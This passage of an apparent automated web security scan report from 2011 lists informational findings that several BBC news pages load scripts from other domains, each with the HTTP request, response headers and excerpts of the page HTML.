More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.36. http://www.bbc.co.uk/news/world-africa-12432292

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12432292

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-africa-12432292 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:14 GMT
Keep-Alive: timeout=10, max=766
Expires: Sat, 12 Feb 2011 02:03:14 GMT
Connection: close
Set-Cookie: BBC-UID=a48db555ceaae6e26a91696fb16ce7ea3160fa6290c011a9db6b13d2877d290e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a48db555ceaae6e26a91696fb16ce7ea3160fa6290c011a9db6b13d2877d290e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.37. http://www.bbc.co.uk/news/world-africa-12433674

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12433674

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-africa-12433674 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=b49dc5250e4ac6c31addca0b61e264006ce8ae32b0903179fbbbe34e00fe142c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b49dc5250e4ac6c31addca0b61e264006ce8ae32b0903179fbbbe34e00fe142c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.38. http://www.bbc.co.uk/news/world-asia-pacific-12427423

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12427423

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-asia-pacific-12427423 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=c4bd45359e0a96d39bdab94fe197cbb303017fbb8090319ad46b7ab4201c36e20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c4bd45359e0a96d39bdab94fe197cbb303017fbb8090319ad46b7ab4201c36e20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.39. http://www.bbc.co.uk/news/world-asia-pacific-12428385

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12428385

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-asia-pacific-12428385 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=540d4555ce6a66b41addfebcc1cf7b51cb680fed706021e9eb6bc34f137543320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=540d4555ce6a66b41addfebcc1cf7b51cb680fed706021e9eb6bc34f137543320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.40. http://www.bbc.co.uk/news/world-asia-pacific-12430671

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12430671

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-asia-pacific-12430671 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=54fd85a5eeea96440a01fa9f5119eda96a816e5ee02051c96beb130277ad09fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54fd85a5eeea96440a01fa9f5119eda96a816e5ee02051c96beb130277ad09fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.41. http://www.bbc.co.uk/news/world-europe-12429539

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12429539

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-europe-12429539 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:17 GMT
Keep-Alive: timeout=10, max=777
Expires: Sat, 12 Feb 2011 02:03:17 GMT
Connection: close
Set-Cookie: BBC-UID=645d75e54e2ae6950bd78b4f51e88217bb2fc0f84050e1ea845bda9523212a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=645d75e54e2ae6950bd78b4f51e88217bb2fc0f84050e1ea845bda9523212a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.42. http://www.bbc.co.uk/news/world-europe-12432879

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12432879

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-europe-12432879 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:17 GMT
Keep-Alive: timeout=10, max=719
Expires: Sat, 12 Feb 2011 02:03:17 GMT
Connection: close
Set-Cookie: BBC-UID=348d65a5ee0aa6851ada3716d15112b99db0e0cd40a04139fbfbc3ce3e6b2c9e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=348d65a5ee0aa6851ada3716d15112b99db0e0cd40a04139fbfbc3ce3e6b2c9e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.43. http://www.bbc.co.uk/news/world-latin-america-12427051

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12427051

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-latin-america-12427051 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:18 GMT
Keep-Alive: timeout=10, max=782
Expires: Sat, 12 Feb 2011 02:03:18 GMT
Connection: close
Set-Cookie: BBC-UID=d42d05555eea7676ca1f6c97e1e64e37e63a7703f070717a947b1a74e68cd0f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d42d05555eea7676ca1f6c97e1e64e37e63a7703f070717a947b1a74e68cd0f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.44. http://www.bbc.co.uk/news/world-latin-america-12427057

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12427057

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-latin-america-12427057 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=732
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=a48d65b59e2ab6d889ad674e719941ff211ada7af020d14ad45b5a1402accb4a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a48d65b59e2ab6d889ad674e719941ff211ada7af020d14ad45b5a1402accb4a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.45. http://www.bbc.co.uk/news/world-latin-america-12436213

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12436213

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-latin-america-12436213 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=844da5e5fe3aa6e88beb58abb1c5e39a3b1c63a6506081399b5bf2cdd4bfc14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=844da5e5fe3aa6e88beb58abb1c5e39a3b1c63a6506081399b5bf2cdd4bfc14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
